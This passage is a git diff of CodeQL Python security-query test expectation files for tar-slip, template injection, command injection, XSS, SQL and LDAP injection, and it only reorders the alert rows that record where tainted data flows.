tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:61:21:61:25 | ControlFlowNode for entry | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | tarslip.py:61:21:61:25 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:91:1:91:3 | ControlFlowNode for tar | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | tarslip.py:91:1:91:3 | ControlFlowNode for tar | This file extraction depends on a $@. 
| tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:96:17:96:21 | ControlFlowNode for entry | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | tarslip.py:96:17:96:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:110:1:110:3 | ControlFlowNode for tar | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | tarslip.py:110:1:110:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:113:24:113:26 | ControlFlowNode for tar | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | tarslip.py:113:24:113:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | potentially untrusted source | diff --git a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected index a4bf57e174c1..f92107728395 100644 --- a/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected 
@@ -1,6 +1,3 @@ -#select -| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | -| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | edges | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | provenance | | @@ -14,3 +11,6 @@ nodes | JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | subpaths +#select +| JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:10:18:10:25 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | +| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected index 99941d47b288..563a0ac74aec 100644 
--- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected 
@@ -1,13 +1,3 @@ -#select -| command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. 
| command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | edges | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:5:26:5:32 | ControlFlowNode for request | provenance | | | command_injection.py:5:26:5:32 | ControlFlowNode for request | command_injection.py:18:13:18:19 | ControlFlowNode for request | provenance | | 
@@ -40,3 +30,13 @@ nodes | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | subpaths +#select +| command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. 
| command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected index bf4f584c8157..d332231e0c99 100644 --- a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected +++ b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected 
@@ -1,7 +1,3 @@ -#select -| reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:2:26:2:32 | ControlFlowNode for request | provenance | | | reflected_xss.py:2:26:2:32 | ControlFlowNode for request | reflected_xss.py:9:18:9:24 | ControlFlowNode for request | provenance | | 
@@ -32,3 +28,7 @@ nodes | reflected_xss.py:27:23:27:29 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths +#select +| reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected index c1958c23858d..9ff8b1d718c1 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected 
@@ -1,20 +1,3 @@ -#select -| sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | edges | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | provenance | | | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | provenance | | 
@@ -52,3 +35,20 @@ nodes | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | semmle.label | ControlFlowNode for username | | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | semmle.label | ControlFlowNode for username | subpaths +#select +| sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | This SQL query depends on a $@. 
| sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected index ae30a38acc32..20170029899e 100644 --- a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected 
@@ -1,14 +1,3 @@ -#select -| ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. 
| ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | edges | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:1:19:1:25 | ControlFlowNode for request | provenance | | | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:1:19:1:25 | ControlFlowNode for request | provenance | | 
@@ -119,3 +108,14 @@ nodes | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | semmle.label | ControlFlowNode for dn | | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | semmle.label | ControlFlowNode for search_filter | subpaths +#select +| ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. 
